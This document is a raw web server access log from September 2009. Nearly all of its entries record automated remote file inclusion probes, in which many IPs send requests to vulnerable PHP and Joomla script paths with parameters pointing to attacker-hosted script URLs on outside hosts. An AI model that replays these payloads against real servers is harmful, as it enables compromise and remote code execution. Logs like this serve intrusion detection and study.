114.4.8.14 - - [08/Sep/2009:08:45:08 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:48:17 -0500] "GET /logs/access_log.1237334400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:08:50:30 -0500] "GET /config.php?path_to_root=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:08:50:30 -0500] "GET /logs/config.php?path_to_root=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:08:50:30 -0500] "GET /logs/access_log.1245888000/config.php?path_to_root=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:55:04 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:55:04 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:55:04 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:55:19 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:55:19 -0500] "GET /logs/access_log.1236038400//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:55:44 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:58:12 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:58:12 -0500] "GET /logs/access_log.1241222400////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:58:14 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 200 204204 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:58:20 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:58:20 -0500] "GET /logs/access_log.1241222400////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:58:22 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 200 204204 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:58:56 -0500] "GET /logs/access_log.1243209600////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:59:07 -0500] "GET /logs/access_log.1243209600////?_SERVER[DOCUMENT_ROOT]=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.111.80.234 - - [08/Sep/2009:09:02:13 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
78.111.80.234 - - [08/Sep/2009:09:02:13 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.111.80.234 - - [08/Sep/2009:09:02:13 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.111.80.234 - - [08/Sep/2009:09:02:18 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.253.246.95 - - [08/Sep/2009:09:02:53 -0500] "GET /logs/access_log.1237420800//index.php?DOCUMENT_ROOT=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.253.246.95 - - [08/Sep/2009:09:02:53 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.253.246.95 - - [08/Sep/2009:09:02:53 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:03:30 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:03:30 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:03:30 -0500] "GET /logs/access_log.1230681600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:03:37 -0500] "GET /logs/access_log.1232668800/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:03:53 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:03:53 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:03:53 -0500] "GET /logs/access_log.1232668800/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:06:26 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:06:26 -0500] "GET /logs/access_log.1244592000/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:06:26 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:06:30 -0500] "GET /logs/access_log.1246752000/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:09:06:49 -0500] "GET /db.php?path_local=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:09:06:49 -0500] "GET /logs/db.php?path_local=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:09:06:49 -0500] "GET /logs/access_log.1243036800/db.php?path_local=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
204.30.3.225 - - [08/Sep/2009:09:06:49 -0500] "GET /logs/access_log.1243728000/db.php?path_local=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:25 -0500] "GET /ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:25 -0500] "GET /logs/access_log.1246492800/ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:25 -0500] "GET /logs/ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:26 -0500] "GET /logs/access_log.1242950400/ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:26 -0500] "GET /logs/access_log.1246492800/ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:26 -0500] "GET /ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:26 -0500] "GET /logs/ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:09:08:27 -0500] "GET /logs/access_log.1242950400/ipsite.qianway.com/=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:10:15 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:10:15 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:10:15 -0500] "GET /logs/access_log.1236211200/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:11:07 -0500] "GET /logs/access_log.1236038400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.254.216.47 - - [08/Sep/2009:09:14:15 -0500] "GET /logs/bbs/skin/ggambo7002_board/str.php?page=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
65.254.216.47 - - [08/Sep/2009:09:14:15 -0500] "GET /bbs/skin/ggambo7002_board/str.php?page=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
188.120.34.217 - - [08/Sep/2009:09:16:54 -0500] "GET /logs/access_log.1248048000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sayphoto.net/bbs//skin/zero_vote/images/anang/id23.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
188.120.34.217 - - [08/Sep/2009:09:16:54 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sayphoto.net/bbs//skin/zero_vote/images/anang/id23.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
188.120.34.217 - - [08/Sep/2009:09:16:54 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sayphoto.net/bbs//skin/zero_vote/images/anang/id23.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
188.120.34.217 - - [08/Sep/2009:09:17:06 -0500] "GET /logs/access_log.1247270400//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://sayphoto.net/bbs//skin/zero_vote/images/anang/id23.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
74.50.85.104 - - [08/Sep/2009:09:17:53 -0500] "GET //main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:17:53 -0500] "GET /logs//main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:17:53 -0500] "GET /logs/access_log.1248134400//main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:17:56 -0500] "GET /logs//main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:17:56 -0500] "GET /logs/access_log.1248134400//main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:17:56 -0500] "GET //main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:18:02 -0500] "GET /logs/access_log.1247097600//main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:18:05 -0500] "GET /logs/access_log.1247097600//main.php?sayfa=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.239.157.203 - - [08/Sep/2009:09:19:01 -0500] "GET /config.php?path_to_root=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.157.203 - - [08/Sep/2009:09:19:01 -0500] "GET /logs/access_log.1245888000/config.php?path_to_root=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.157.203 - - [08/Sep/2009:09:19:01 -0500] "GET /logs/config.php?path_to_root=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 298 "-""Mozilla/5.0"
199.96.29.70 - - [08/Sep/2009:09:20:50 -0500] "GET //ashnews.php?pathtoashnews=http://indo.home.ro/idbit??? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
199.96.29.70 - - [08/Sep/2009:09:20:50 -0500] "GET /logs//ashnews.php?pathtoashnews=http://indo.home.ro/idbit??? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
85.214.91.139 - - [08/Sep/2009:09:23:30 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:23:30 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:23:30 -0500] "GET /logs/access_log.1245801600//bbs//skin/zero_vote/ask_password.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:24:25 -0500] "GET /logs/access_log.1246060800//bbs//skin/zero_vote/ask_password.php?dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:26:08 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:26:09 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:26:09 -0500] "GET /logs/access_log.1236211200/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:09:26:36 -0500] "GET /logs/access_log.1236038400/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.125.74.87 - - [08/Sep/2009:09:29:19 -0500] "GET /?_zb_path=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.125.74.87 - - [08/Sep/2009:09:29:19 -0500] "GET /logs/access_log.1237680000/?_zb_path=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.125.74.87 - - [08/Sep/2009:09:29:20 -0500] "GET /logs/?_zb_path=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 200 204197 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:09:34:10 -0500] "GET /logs/bbs/skin/ggambo7002_board/str.php?page=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:09:34:11 -0500] "GET /bbs/skin/ggambo7002_board/str.php?page=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
211.233.69.41 - - [08/Sep/2009:09:36:12 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:09:36:12 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:09:36:12 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:09:36:12 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:09:38:22 -0500] "GET //include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:09:38:28 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:09:38:28 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:09:38:28 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:39:22 -0500] "GET /logs/access_log.1244246400//admin/config_settings.tpl.php?include_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:39:22 -0500] "GET /logs//admin/config_settings.tpl.php?include_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:39:22 -0500] "GET //admin/config_settings.tpl.php?include_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.118.116.55 - - [08/Sep/2009:09:39:23 -0500] "GET /logs/access_log.1243641600//admin/config_settings.tpl.php?include_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
79.174.78.83 - - [08/Sep/2009:09:39:42 -0500] "GET /logs/access_log.1247184000/?sourcedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
79.174.78.83 - - [08/Sep/2009:09:39:42 -0500] "GET /?sourcedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
79.174.78.83 - - [08/Sep/2009:09:39:42 -0500] "GET /logs/access_log.1244678400/?sourcedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
79.174.78.83 - - [08/Sep/2009:09:39:44 -0500] "GET /logs/?sourcedir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 200 204197 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:39:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:39:54 -0500] "GET //skin/zero_vote/error.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:39:54 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:40:10 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:40:10 -0500] "GET //skin/zero_vote/error.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.50.85.104 - - [08/Sep/2009:09:40:10 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:09:41:12 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:09:41:12 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:09:41:12 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:43:41 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:43:41 -0500] "GET /logs/access_log.1239753600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:43:41 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:43:46 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:43:46 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:43:46 -0500] "GET /logs/access_log.1239753600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.55.106.156 - - [08/Sep/2009:09:44:34 -0500] "GET /logs/access_log.1219017600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.90.108.169 - - [08/Sep/2009:09:44:56 -0500] "GET /logs/access_log.1245110400//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:09:45:22 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:09:45:22 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:09:45:22 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.125.74.87 - - [08/Sep/2009:09:46:15 -0500] "GET /logs/access_log.1239062400/?_zb_path=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:47:28 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:47:28 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:47:29 -0500] "GET /logs/access_log.1236470400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:09:47:29 -0500] "GET /logs/access_log.1235433600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
